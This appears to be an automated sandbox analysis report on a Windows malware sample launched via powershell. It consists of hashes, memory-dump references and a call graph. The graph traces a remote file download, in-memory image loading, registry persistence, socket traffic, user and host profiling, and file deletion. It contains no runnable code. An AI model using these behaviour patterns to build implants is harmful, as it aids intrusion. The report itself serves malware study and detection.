                                                                                • Instruction ID: ee4c5126f423776eb9a5731b19c02df731c3fb909add3a985d01740c411c7d17
                                                                                • Opcode Fuzzy Hash: 558d5b2237cba048f15d24093ce6ac10bc7a615790aa9371d4eb45614441c896
                                                                                • Instruction Fuzzy Hash: 71F11374B003699FCB159F68C404B6ABBA2EFC8720F248469ED059B390DB72DC56CB91

                                                                                Control-flow Graph

                                                                                [Control-flow graph omitted: function at 0x71204f8, basic blocks 0x71204f8-0x71206c0; no API calls resolved in this function.]
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 692b242f455e2ae8c965dff596592432e0966a18e7765a35e2c036dfdf5097fd
                                                                                • Instruction ID: 5fe4eadaa365db36e1cce446afab15a04138e67fd93aec9429b46dc3f930e879
                                                                                • Opcode Fuzzy Hash: 692b242f455e2ae8c965dff596592432e0966a18e7765a35e2c036dfdf5097fd
                                                                                • Instruction Fuzzy Hash: 995157B1B043289FD7159B688814B2ABFE2AFC9710F14855AE949DF3C1CA31DC5AC7E1

                                                                                Control-flow Graph

                                                                                [Control-flow graph omitted: function at 0x28c1bf8, basic blocks 0x28c1bf8-0x28c7ec3; the block at 0x28c7e71 calls URLDownloadToFileW (the reference at 0x028C7E99 listed under APIs below).]
                                                                                APIs
                                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 028C7E99
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1814443013.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_28c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: DownloadFile
                                                                                • String ID:
                                                                                • API String ID: 1407266417-0
                                                                                • Opcode ID: c625e35586ae72468639a8817c0430babbcf0b1139098daadbf22adcb954eaa8
                                                                                • Instruction ID: dd033aee65a5a8f82b62fd1e33de8ce8da8cb439188ee897adf137e904c672d8
                                                                                • Opcode Fuzzy Hash: c625e35586ae72468639a8817c0430babbcf0b1139098daadbf22adcb954eaa8
                                                                                • Instruction Fuzzy Hash: A0212BBAD01259DFCB00CF99D984BDEFBB4FB48710F208129E918A7210D375A954CFA4

                                                                                Control-flow Graph

                                                                                [Control-flow graph omitted: function at 0x71245f5, an alternate entry into the same basic blocks as the 0x7124610 graph above (0x71245f5-0x7124bce); the call site at 0x7124a2f again resolved to 0x28c7a18, 0x28c1bf8, 0x28c7da8, 0x28c782a, 0x28c7824 and 0x28c7c45.]
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q
                                                                                • API String ID: 0-2862610199
                                                                                • Opcode ID: 243769ddae491d0d7953e704d53bef845f2a2d98bb5681b0be5f7d94c2ca203e
                                                                                • Instruction ID: 28a0e7233669c0d881b25cac7da16b6292068c621a01a1a97eafcd7a71b42a33
                                                                                • Opcode Fuzzy Hash: 243769ddae491d0d7953e704d53bef845f2a2d98bb5681b0be5f7d94c2ca203e
                                                                                • Instruction Fuzzy Hash: 409102B4A003A59FCB19CF58C444B69BBA2FF88710F258469EC159B3D0DB71DC56DB90

                                                                                Control-flow Graph

                                                                                [Control-flow graph omitted: function at 0x7121f25, basic blocks 0x7121f25-0x7122642; no API calls resolved in this function.]
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f8dc84579ee91c5120e89415ded4c5ffb1246edcfd34a2dabd34795b5156351
                                                                                • Instruction ID: 5f62aeed1cdff52575fe77dea4ce857a610dfd180aa0c897f69ad2adc2891268
                                                                                • Opcode Fuzzy Hash: 1f8dc84579ee91c5120e89415ded4c5ffb1246edcfd34a2dabd34795b5156351
                                                                                • Instruction Fuzzy Hash: F14108B0B043169FDB25CF188C40A6E7BA1BF85210F5B80A5DA01DF2D1D735D9A7EB62
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1813804919.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_285d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e051724d1450809c73fcf6f29c5d35ff6e8fe307db7809cf14aab82f71e3faac
                                                                                • Instruction ID: 0a8ff6c551977d141df3fa262be8d024efcd177b0b0fe00bab4a5590dd23ba21
                                                                                • Opcode Fuzzy Hash: e051724d1450809c73fcf6f29c5d35ff6e8fe307db7809cf14aab82f71e3faac
                                                                                • Instruction Fuzzy Hash: B90126394083549AE7108E2ACDC4B67BFD8EF45328F08C42AEC4C8F246C379D846C6B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1813804919.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_285d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 04192ad054fb149e050268bf55440589ae2ab3617d893d4dba495ab6773bb61f
                                                                                • Instruction ID: 9646ef393ca436111f83c92eb887d229e7d22f1df204f3f71ebc6de9e65da43c
                                                                                • Opcode Fuzzy Hash: 04192ad054fb149e050268bf55440589ae2ab3617d893d4dba495ab6773bb61f
                                                                                • Instruction Fuzzy Hash: 5A014C6540E3C09ED7128B258D94B52BFB4EF53224F18C1DBDC888F293C2699849C772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                • API String ID: 0-1608119003
                                                                                • Opcode ID: 145217e351896301d2ca9d084be7fe5a36f607e3450d033255a8e99d283f9f7a
                                                                                • Instruction ID: 09dc241407a5cca24a34a506828aa920394da4c015dbd928125c4ae09f4ce274
                                                                                • Opcode Fuzzy Hash: 145217e351896301d2ca9d084be7fe5a36f607e3450d033255a8e99d283f9f7a
                                                                                • Instruction Fuzzy Hash: B4F139B1B002699FCB15DB6894006ABBBF6AFC5210F1484AAD506CF2D1DB31C967E791
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-1420252700
                                                                                • Opcode ID: b608474bb940af3b72b038da3d42d6c42c990e4e3ccf3bdc773c89a350b62860
                                                                                • Instruction ID: 8b7e36f5a5ae43b4296cdc21b380d4ef55e8eb48358af544ab3b6e619c1988fa
                                                                                • Opcode Fuzzy Hash: b608474bb940af3b72b038da3d42d6c42c990e4e3ccf3bdc773c89a350b62860
                                                                                • Instruction Fuzzy Hash: E6815DB0B04369DFCB1A9B68D40466ABFF1EF85210F1484ABD425CB2D1DB35C86AD792
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: 12264d22f85c550bd84ab0d645faa13c21b6244117c654cd4b1fe1376b4d929b
                                                                                • Instruction ID: 20ecb8889eb7cbe1960ca9908468f4db1228aec0b083608978c9d9370e3576ab
                                                                                • Opcode Fuzzy Hash: 12264d22f85c550bd84ab0d645faa13c21b6244117c654cd4b1fe1376b4d929b
                                                                                • Instruction Fuzzy Hash: 3C218BB170032A5BDB29856A5C00B37AFEA5BC0710F24842AA41ACF3C5DE3AC9579321
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                • API String ID: 0-2049395529
                                                                                • Opcode ID: 1f61a54ea339f0eba942d0f0d371733b050a1a18eb326f18bbac97f5bb6fc51f
                                                                                • Instruction ID: 21a815d3eb82141e7eec21f8154d762276952b412b247eb0ae8ad6053b622909
                                                                                • Opcode Fuzzy Hash: 1f61a54ea339f0eba942d0f0d371733b050a1a18eb326f18bbac97f5bb6fc51f
                                                                                • Instruction Fuzzy Hash: 4801F12070D3E54FD72B02291C2052A6FB25FCB69032A42DBC080CF2DBCE558C5A93A6

                                                                                Execution Graph

                                                                                Execution Coverage: 1.9%
                                                                                Dynamic/Decrypted Code Coverage: 22.8%
                                                                                Signature Coverage: 25.8%
                                                                                Total number of Nodes: 1130
                                                                                Total number of Limit Nodes: 54
                                                                                [Execution graph omitted (textual dump of the rendered call graph, truncated in the source). API call chains recoverable from it:
                                                                                • 0x4099d0 -> 0x409a97 -> 0x409af7 CallNextHookEx (a hook procedure handing off to the next hook in the chain)
                                                                                • 0x41d4d0 -> 0x41d071 DeleteCriticalSection / EnterCriticalSection / LeaveCriticalSection; 0x431f99 -> 0x43a88c -> 0x446b28 RtlAllocateHeap
                                                                                • 0x41d4d0 -> ... -> 0x43264f -> 0x43256f -> 0x43293a CryptAcquireContextA -> 0x43295b CryptGenRandom -> 0x432970 CryptReleaseContext
                                                                                • 0x426030 -> 0x4260f7 recv; 0x426091 -> 0x42610e send
                                                                                • 0x44e8b6 -> 0x44b9be -> 0x44ba11 HeapReAlloc, with 0x446b28 RtlAllocateHeap on the allocation path
                                                                                • 0x78003c -> 0x780e0f SetErrorMode (twice) -> 0x780dbb GetPEB -> 0x780238 VirtualAlloc -> 0x7802ce VirtualProtect -> 0x780439 VirtualFree -> 0x7805f4 / 0x7804e3 LoadLibraryA: a VirtualAlloc / VirtualProtect / LoadLibraryA sequence in the dynamically allocated region at 0x780000, typical of a PE image being mapped in memory rather than loaded from disk
                                                                                • 0x5b0000 -> 0x5b07ca CreateToolhelp32Snapshot -> 0x5b07e6 Module32First -> 0x5b04a1 VirtualAlloc (second dynamically allocated region, at 0x5b0000)
                                                                                • 0x43a998 -> 0x444acc EnterCriticalSection -> 0x43aa0f LeaveCriticalSection; 0x402bcc -> 0x4015d3 -> 0x43360d -> 0x437bd7 RaiseException
                                                                                • 0x4339be -> 0x4336b3 (dump cut off at this point)]
IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 84636->84964 84638 433b2b 84965 4426be 28 API calls _abort 84638->84965 84651 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 84640->84651 84958 4434d1 5 API calls _ValidateLocalCookies 84640->84958 84641 433b31 84966 442670 28 API calls _abort 84641->84966 84644 433a14 84646 433a1a 84644->84646 84959 443475 5 API calls _ValidateLocalCookies 84644->84959 84645 433b39 84648 433a9b 84675 433c5e 84648->84675 84651->84648 84960 43edf4 38 API calls 4 library calls 84651->84960 84658 433abd 84658->84638 84659 433ac1 84658->84659 84660 433aca 84659->84660 84962 442661 28 API calls _abort 84659->84962 84963 433842 13 API calls 2 library calls 84660->84963 84663 433ad2 84663->84646 84665 4336bc 84664->84665 84967 433e0a IsProcessorFeaturePresent 84665->84967 84667 4336c8 84968 4379ee 10 API calls 3 library calls 84667->84968 84669 4336cd 84670 4336d1 84669->84670 84969 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84669->84969 84670->84635 84672 4336da 84673 4336e8 84672->84673 84970 437a17 8 API calls 3 library calls 84672->84970 84673->84635 84971 436050 84675->84971 84677 433c71 GetStartupInfoW 84678 433aa1 84677->84678 84679 443422 84678->84679 84973 44ddc9 84679->84973 84681 44342b 84682 433aaa 84681->84682 84977 44e0d3 38 API calls 84681->84977 84684 40d767 84682->84684 84979 41bce3 LoadLibraryA GetProcAddress 84684->84979 84686 40d783 GetModuleFileNameW 84984 40e168 84686->84984 84688 40d79f 84999 401fbd 84688->84999 84691 401fbd 28 API calls 84692 40d7bd 84691->84692 85003 41afc3 84692->85003 84696 40d7cf 85028 401d8c 84696->85028 84698 40d7d8 84699 40d835 84698->84699 84700 40d7eb 84698->84700 85034 401d64 84699->85034 85270 40e986 90 API calls 84700->85270 84703 40d845 84706 401d64 28 API calls 84703->84706 84704 40d7fd 84705 401d64 28 API calls 
84704->84705 84708 40d809 84705->84708 84707 40d864 84706->84707 85039 404cbf 84707->85039 85271 40e937 68 API calls 84708->85271 84710 40d873 85043 405ce6 84710->85043 84713 40d87f 85046 401eef 84713->85046 84714 40d824 85272 40e155 68 API calls 84714->85272 84717 40d88b 84718 401eea 26 API calls 84717->84718 84719 40d894 84718->84719 84721 401eea 26 API calls 84719->84721 84720 401eea 26 API calls 84722 40dc9f 84720->84722 84723 40d89d 84721->84723 84961 433c94 GetModuleHandleW 84722->84961 84724 401d64 28 API calls 84723->84724 84725 40d8a6 84724->84725 85050 401ebd 84725->85050 84727 40d8b1 84728 401d64 28 API calls 84727->84728 84729 40d8ca 84728->84729 84730 401d64 28 API calls 84729->84730 84732 40d8e5 84730->84732 84731 40d946 84733 401d64 28 API calls 84731->84733 84748 40e134 84731->84748 84732->84731 85273 4085b4 84732->85273 84739 40d95d 84733->84739 84735 40d912 84736 401eef 26 API calls 84735->84736 84737 40d91e 84736->84737 84740 401eea 26 API calls 84737->84740 84738 40d9a4 85054 40bed7 84738->85054 84739->84738 84745 4124b7 3 API calls 84739->84745 84742 40d927 84740->84742 85277 4124b7 RegOpenKeyExA 84742->85277 84743 40d9aa 84744 40d82d 84743->84744 85057 41a463 84743->85057 84744->84720 84750 40d988 84745->84750 85353 412902 30 API calls 84748->85353 84749 40d9c5 84751 40da18 84749->84751 85074 40697b 84749->85074 84750->84738 85280 412902 30 API calls 84750->85280 84754 401d64 28 API calls 84751->84754 84756 40da21 84754->84756 84765 40da32 84756->84765 84766 40da2d 84756->84766 84758 40e14a 85354 4112b5 64 API calls ___scrt_fastfail 84758->85354 84759 40d9e4 85281 40699d 30 API calls 84759->85281 84760 40d9ee 84764 401d64 28 API calls 84760->84764 84773 40d9f7 84764->84773 84770 401d64 28 API calls 84765->84770 85284 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 84766->85284 84767 40d9e9 85282 4064d0 97 API calls 84767->85282 84771 40da3b 84770->84771 84772 41ae08 28 API calls 84771->84772 84774 40da46 84772->84774 
84773->84751 84776 40da13 84773->84776 85078 401e18 84774->85078 85283 4064d0 97 API calls 84776->85283 84777 40da51 84779 401e13 26 API calls 84777->84779 84780 40da5a 84779->84780 84781 401d64 28 API calls 84780->84781 84782 40da63 84781->84782 84783 401d64 28 API calls 84782->84783 84784 40da7d 84783->84784 84785 401d64 28 API calls 84784->84785 84786 40da97 84785->84786 84787 401d64 28 API calls 84786->84787 84789 40dab0 84787->84789 84788 40db1d 84790 40db2c 84788->84790 84797 40dcaa ___scrt_fastfail 84788->84797 84789->84788 84791 401d64 28 API calls 84789->84791 84792 40db35 84790->84792 84820 40dbb1 ___scrt_fastfail 84790->84820 84795 40dac5 _wcslen 84791->84795 84793 401d64 28 API calls 84792->84793 84794 40db3e 84793->84794 84796 401d64 28 API calls 84794->84796 84795->84788 84798 401d64 28 API calls 84795->84798 84799 40db50 84796->84799 85344 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 84797->85344 84800 40dae0 84798->84800 84802 401d64 28 API calls 84799->84802 84804 401d64 28 API calls 84800->84804 84803 40db62 84802->84803 84807 401d64 28 API calls 84803->84807 84805 40daf5 84804->84805 85285 40c89e 84805->85285 84806 40dcef 84808 401d64 28 API calls 84806->84808 84809 40db8b 84807->84809 84810 40dd16 84808->84810 84815 401d64 28 API calls 84809->84815 84816 401f66 28 API calls 84810->84816 84813 401e18 26 API calls 84814 40db14 84813->84814 84817 401e13 26 API calls 84814->84817 84818 40db9c 84815->84818 84819 40dd25 84816->84819 84817->84788 85342 40bc67 46 API calls _wcslen 84818->85342 85092 4126d2 RegCreateKeyA 84819->85092 85082 4128a2 84820->85082 84825 40dc45 ctype 84829 401d64 28 API calls 84825->84829 84826 40dbac 84826->84820 84827 401d64 28 API calls 84828 40dd47 84827->84828 85098 43a5e7 84828->85098 84830 40dc5c 84829->84830 84830->84806 84834 40dc70 84830->84834 84833 40dd5e 85345 41beb0 87 API calls ___scrt_fastfail 84833->85345 84836 401d64 28 API calls 84834->84836 84835 40dd81 84841 401f66 28 API calls 84835->84841 84838 
40dc7e 84836->84838 84839 41ae08 28 API calls 84838->84839 84843 40dc87 84839->84843 84840 40dd65 CreateThread 84840->84835 85765 41c96f 10 API calls 84840->85765 84842 40dd96 84841->84842 84844 401f66 28 API calls 84842->84844 85343 40e219 112 API calls 84843->85343 84846 40dda5 84844->84846 85102 41a686 84846->85102 84847 40dc8c 84847->84806 84849 40dc93 84847->84849 84849->84744 84851 401d64 28 API calls 84852 40ddb6 84851->84852 84853 401d64 28 API calls 84852->84853 84854 40ddcb 84853->84854 84855 401d64 28 API calls 84854->84855 84856 40ddeb 84855->84856 84857 43a5e7 42 API calls 84856->84857 84858 40ddf8 84857->84858 84859 401d64 28 API calls 84858->84859 84860 40de03 84859->84860 84861 401d64 28 API calls 84860->84861 84862 40de14 84861->84862 84863 401d64 28 API calls 84862->84863 84864 40de29 84863->84864 84865 401d64 28 API calls 84864->84865 84866 40de3a 84865->84866 84867 40de41 StrToIntA 84866->84867 85126 409517 84867->85126 84870 401d64 28 API calls 84871 40de5c 84870->84871 84872 40dea1 84871->84872 84873 40de68 84871->84873 84875 401d64 28 API calls 84872->84875 85346 43360d 22 API calls 3 library calls 84873->85346 84877 40deb1 84875->84877 84876 40de71 84878 401d64 28 API calls 84876->84878 84880 40def9 84877->84880 84881 40debd 84877->84881 84879 40de84 84878->84879 84882 40de8b CreateThread 84879->84882 84884 401d64 28 API calls 84880->84884 85347 43360d 22 API calls 3 library calls 84881->85347 84882->84872 85761 419128 109 API calls __EH_prolog 84882->85761 84886 40df02 84884->84886 84885 40dec6 84887 401d64 28 API calls 84885->84887 84889 40df6c 84886->84889 84890 40df0e 84886->84890 84888 40ded8 84887->84888 84893 40dedf CreateThread 84888->84893 84891 401d64 28 API calls 84889->84891 84892 401d64 28 API calls 84890->84892 84894 40df75 84891->84894 84895 40df1e 84892->84895 84893->84880 85766 419128 109 API calls __EH_prolog 84893->85766 84896 40df81 84894->84896 84897 40dfba 84894->84897 84898 401d64 28 API calls 84895->84898 84900 401d64 
28 API calls 84896->84900 85151 41a7a2 GetComputerNameExW GetUserNameW 84897->85151 84901 40df33 84898->84901 84903 40df8a 84900->84903 85348 40c854 32 API calls 84901->85348 84908 401d64 28 API calls 84903->84908 84904 401e18 26 API calls 84905 40dfce 84904->84905 84907 401e13 26 API calls 84905->84907 84910 40dfd7 84907->84910 84911 40df9f 84908->84911 84909 40df46 84912 401e18 26 API calls 84909->84912 84913 40dfe0 SetProcessDEPPolicy 84910->84913 84914 40dfe3 CreateThread 84910->84914 84922 43a5e7 42 API calls 84911->84922 84915 40df52 84912->84915 84913->84914 84916 40e004 84914->84916 84917 40dff8 CreateThread 84914->84917 85734 40e54f 84914->85734 84918 401e13 26 API calls 84915->84918 84920 40e019 84916->84920 84921 40e00d CreateThread 84916->84921 84917->84916 85762 410f36 137 API calls 84917->85762 84919 40df5b CreateThread 84918->84919 84919->84889 85763 40196b 49 API calls 84919->85763 84924 40e073 84920->84924 84926 401f66 28 API calls 84920->84926 84921->84920 85764 411524 38 API calls ___scrt_fastfail 84921->85764 84923 40dfac 84922->84923 85349 40b95c 7 API calls 84923->85349 85162 41246e RegOpenKeyExA 84924->85162 84927 40e046 84926->84927 85350 404c9e 28 API calls 84927->85350 84931 40e053 84933 401f66 28 API calls 84931->84933 84932 40e12a 85174 40cbac 84932->85174 84935 40e062 84933->84935 84934 41ae08 28 API calls 84937 40e0a4 84934->84937 84938 41a686 79 API calls 84935->84938 85165 412584 RegOpenKeyExW 84937->85165 84940 40e067 84938->84940 84942 401eea 26 API calls 84940->84942 84942->84924 84945 401e13 26 API calls 84948 40e0c5 84945->84948 84946 40e0ed DeleteFileW 84947 40e0f4 84946->84947 84946->84948 84949 41ae08 28 API calls 84947->84949 84948->84946 84948->84947 84950 40e0db Sleep 84948->84950 84951 40e104 84949->84951 85351 401e07 84950->85351 85170 41297a RegOpenKeyExW 84951->85170 84954 40e117 84955 401e13 26 API calls 84954->84955 84956 40e121 84955->84956 84957 401e13 26 API calls 84956->84957 84957->84932 84958->84644 
84959->84651 84960->84648 84961->84658 84962->84660 84963->84663 84964->84638 84965->84641 84966->84645 84967->84667 84968->84669 84969->84672 84970->84670 84972 436067 84971->84972 84972->84677 84972->84972 84974 44dddb 84973->84974 84975 44ddd2 84973->84975 84974->84681 84978 44dcc8 51 API calls 5 library calls 84975->84978 84977->84681 84978->84974 84980 41bd22 LoadLibraryA GetProcAddress 84979->84980 84981 41bd12 GetModuleHandleA GetProcAddress 84979->84981 84982 41bd4b 32 API calls 84980->84982 84983 41bd3b LoadLibraryA GetProcAddress 84980->84983 84981->84980 84982->84686 84983->84982 85355 41a63f FindResourceA 84984->85355 84987 43a88c ___std_exception_copy 21 API calls 84988 40e192 _Yarn 84987->84988 85358 401f86 84988->85358 84991 401eef 26 API calls 84992 40e1b8 84991->84992 84993 401eea 26 API calls 84992->84993 84994 40e1c1 84993->84994 84995 43a88c ___std_exception_copy 21 API calls 84994->84995 84996 40e1d2 _Yarn 84995->84996 85362 406052 84996->85362 84998 40e205 84998->84688 85000 401fcc 84999->85000 85365 402501 85000->85365 85002 401fea 85002->84691 85004 41afd6 85003->85004 85008 41b048 85004->85008 85016 401eef 26 API calls 85004->85016 85019 401eea 26 API calls 85004->85019 85023 41b046 85004->85023 85370 403b60 28 API calls 85004->85370 85371 41bfa9 85004->85371 85005 401eea 26 API calls 85006 41b078 85005->85006 85007 401eea 26 API calls 85006->85007 85009 41b080 85007->85009 85378 403b60 28 API calls 85008->85378 85012 401eea 26 API calls 85009->85012 85014 40d7c6 85012->85014 85013 41b054 85015 401eef 26 API calls 85013->85015 85024 40e8bd 85014->85024 85017 41b05d 85015->85017 85016->85004 85018 401eea 26 API calls 85017->85018 85020 41b065 85018->85020 85019->85004 85021 41bfa9 28 API calls 85020->85021 85021->85023 85023->85005 85025 40e8ca 85024->85025 85027 40e8da 85025->85027 85406 40200a 26 API calls 85025->85406 85027->84696 85029 40200a 85028->85029 85033 40203a 85029->85033 85407 402654 26 API calls 85029->85407 85031 40202b 85408 
4026ba 26 API calls _Deallocate 85031->85408 85033->84698 85035 401d6c 85034->85035 85036 401d74 85035->85036 85409 401fff 28 API calls 85035->85409 85036->84703 85040 404ccb 85039->85040 85410 402e78 85040->85410 85042 404cee 85042->84710 85419 404bc4 85043->85419 85045 405cf4 85045->84713 85047 401efe 85046->85047 85049 401f0a 85047->85049 85428 4021b9 26 API calls 85047->85428 85049->84717 85052 401ec9 85050->85052 85051 401ee4 85051->84727 85052->85051 85053 402325 28 API calls 85052->85053 85053->85051 85429 401e8f 85054->85429 85056 40bee1 CreateMutexA GetLastError 85056->84743 85431 41b15b 85057->85431 85059 41a471 85435 412513 RegOpenKeyExA 85059->85435 85062 401eef 26 API calls 85063 41a49f 85062->85063 85064 401eea 26 API calls 85063->85064 85065 41a4a7 85064->85065 85066 41a4fa 85065->85066 85067 412513 31 API calls 85065->85067 85066->84749 85068 41a4cd 85067->85068 85069 41a4d8 StrToIntA 85068->85069 85070 41a4ef 85069->85070 85071 41a4e6 85069->85071 85073 401eea 26 API calls 85070->85073 85440 41c102 28 API calls 85071->85440 85073->85066 85075 40698f 85074->85075 85076 4124b7 3 API calls 85075->85076 85077 406996 85076->85077 85077->84759 85077->84760 85079 401e27 85078->85079 85081 401e33 85079->85081 85441 402121 26 API calls 85079->85441 85081->84777 85083 4128c0 85082->85083 85084 406052 28 API calls 85083->85084 85085 4128d5 85084->85085 85086 401fbd 28 API calls 85085->85086 85087 4128e5 85086->85087 85088 4126d2 29 API calls 85087->85088 85089 4128ef 85088->85089 85090 401eea 26 API calls 85089->85090 85091 4128fc 85090->85091 85091->84825 85093 412722 85092->85093 85096 4126eb 85092->85096 85094 401eea 26 API calls 85093->85094 85095 40dd3b 85094->85095 85095->84827 85097 4126fd RegSetValueExA RegCloseKey 85096->85097 85097->85093 85099 43a600 _swprintf 85098->85099 85442 43993e 85099->85442 85103 41a737 85102->85103 85104 41a69c GetLocalTime 85102->85104 85106 401eea 26 API calls 85103->85106 85105 404cbf 28 API calls 85104->85105 85107 
41a6de 85105->85107 85108 41a73f 85106->85108 85109 405ce6 28 API calls 85107->85109 85110 401eea 26 API calls 85108->85110 85111 41a6ea 85109->85111 85112 40ddaa 85110->85112 85476 4027cb 85111->85476 85112->84851 85114 41a6f6 85115 405ce6 28 API calls 85114->85115 85116 41a702 85115->85116 85479 406478 76 API calls 85116->85479 85118 41a710 85119 401eea 26 API calls 85118->85119 85120 41a71c 85119->85120 85121 401eea 26 API calls 85120->85121 85122 41a725 85121->85122 85123 401eea 26 API calls 85122->85123 85124 41a72e 85123->85124 85125 401eea 26 API calls 85124->85125 85125->85103 85127 409536 _wcslen 85126->85127 85128 409541 85127->85128 85129 409558 85127->85129 85131 40c89e 32 API calls 85128->85131 85130 40c89e 32 API calls 85129->85130 85132 409560 85130->85132 85133 409549 85131->85133 85134 401e18 26 API calls 85132->85134 85135 401e18 26 API calls 85133->85135 85136 40956e 85134->85136 85137 409553 85135->85137 85138 401e13 26 API calls 85136->85138 85140 401e13 26 API calls 85137->85140 85139 409576 85138->85139 85499 40856b 28 API calls 85139->85499 85141 4095ad 85140->85141 85484 409837 85141->85484 85144 409588 85500 4028cf 85144->85500 85147 409593 85148 401e18 26 API calls 85147->85148 85149 40959d 85148->85149 85150 401e13 26 API calls 85149->85150 85150->85137 85526 403b40 85151->85526 85155 41a7fd 85156 4028cf 28 API calls 85155->85156 85157 41a807 85156->85157 85158 401e13 26 API calls 85157->85158 85159 41a810 85158->85159 85160 401e13 26 API calls 85159->85160 85161 40dfc3 85160->85161 85161->84904 85163 40e08b 85162->85163 85164 41248f RegQueryValueExA RegCloseKey 85162->85164 85163->84932 85163->84934 85164->85163 85166 4125b0 RegQueryValueExW RegCloseKey 85165->85166 85167 4125dd 85165->85167 85166->85167 85168 403b40 28 API calls 85167->85168 85169 40e0ba 85168->85169 85169->84945 85171 412992 RegDeleteValueW 85170->85171 85172 4129a6 85170->85172 85171->85172 85173 4129a2 85171->85173 85172->84954 85173->84954 85175 40cbc5 85174->85175 
85176 41246e 3 API calls 85175->85176 85177 40cbcc 85176->85177 85181 40cbeb 85177->85181 85559 401602 85177->85559 85179 40cbd9 85562 4127d5 RegCreateKeyA 85179->85562 85182 413fd4 85181->85182 85183 413feb 85182->85183 85579 41aa73 85183->85579 85185 413ff6 85186 401d64 28 API calls 85185->85186 85187 41400f 85186->85187 85188 43a5e7 42 API calls 85187->85188 85189 41401c 85188->85189 85190 414021 Sleep 85189->85190 85191 41402e 85189->85191 85190->85191 85192 401f66 28 API calls 85191->85192 85193 41403d 85192->85193 85194 401d64 28 API calls 85193->85194 85195 41404b 85194->85195 85196 401fbd 28 API calls 85195->85196 85197 414053 85196->85197 85198 41afc3 28 API calls 85197->85198 85199 41405b 85198->85199 85583 404262 WSAStartup 85199->85583 85201 414065 85202 401d64 28 API calls 85201->85202 85203 41406e 85202->85203 85204 401d64 28 API calls 85203->85204 85228 4140ed 85203->85228 85205 414087 85204->85205 85207 401d64 28 API calls 85205->85207 85206 401fbd 28 API calls 85206->85228 85208 414098 85207->85208 85210 401d64 28 API calls 85208->85210 85209 41afc3 28 API calls 85209->85228 85211 4140a9 85210->85211 85213 401d64 28 API calls 85211->85213 85212 4085b4 28 API calls 85212->85228 85214 4140ba 85213->85214 85216 401d64 28 API calls 85214->85216 85215 401eef 26 API calls 85215->85228 85217 4140cb 85216->85217 85218 401d64 28 API calls 85217->85218 85219 4140dd 85218->85219 85688 404101 87 API calls 85219->85688 85221 41a686 79 API calls 